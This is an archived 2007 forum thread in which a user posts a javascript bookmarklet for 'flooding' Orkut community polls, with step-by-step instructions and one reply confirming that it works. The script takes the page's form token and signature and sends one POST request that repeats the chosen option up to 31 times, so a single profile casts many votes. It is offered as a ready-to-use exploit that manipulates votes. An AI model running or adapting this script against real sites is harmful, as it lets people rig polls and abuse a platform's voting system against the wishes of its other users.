Title: Poll Flooding and Multiple Poll Selection Post by: Khushi on May 31, 2007, 02:13:33 AM Here is the code for Flooding Polls...It can cast 31 Votes per profile !!
How to Use : Go to the community of which you want to flood the poll.. Then click on view all polls. then open the poll you want to flood.. Then just put this script in your address bar(where you write site's address like www.orkut.com)... after that click Enter or press Go Code: javascript:opcao=prompt("select the option u want to vote :\nex: 1 or 2 or 3 or 4...","");votos=prompt("No. of votes?\n31 is maximum",31);send = "POST_TOKEN="+encodeURIComponent(document.getElementsByName('POST_TOKEN')[0].value)+"&signature="+encodeURIComponent(document.getElementsByName('signature')[0].value);for(x=0; x<votos; x++){ send += "&option="+opcao;}send += "&public_vote=1&Action.vote=Enviar+dados";xml=new XMLHttpRequest();xml.open("POST",location.href,false);xml.setRequestHeader('Content-Type','application/x-www-form-urlencoded');xml.send(send);document.body.innerHTML=xml.responseText;void(0) Title: Re: Poll Flooding and Multiple Poll Selection Post by: Tina on July 17, 2007, 02:33:01 AM gr8 trick! it works!
|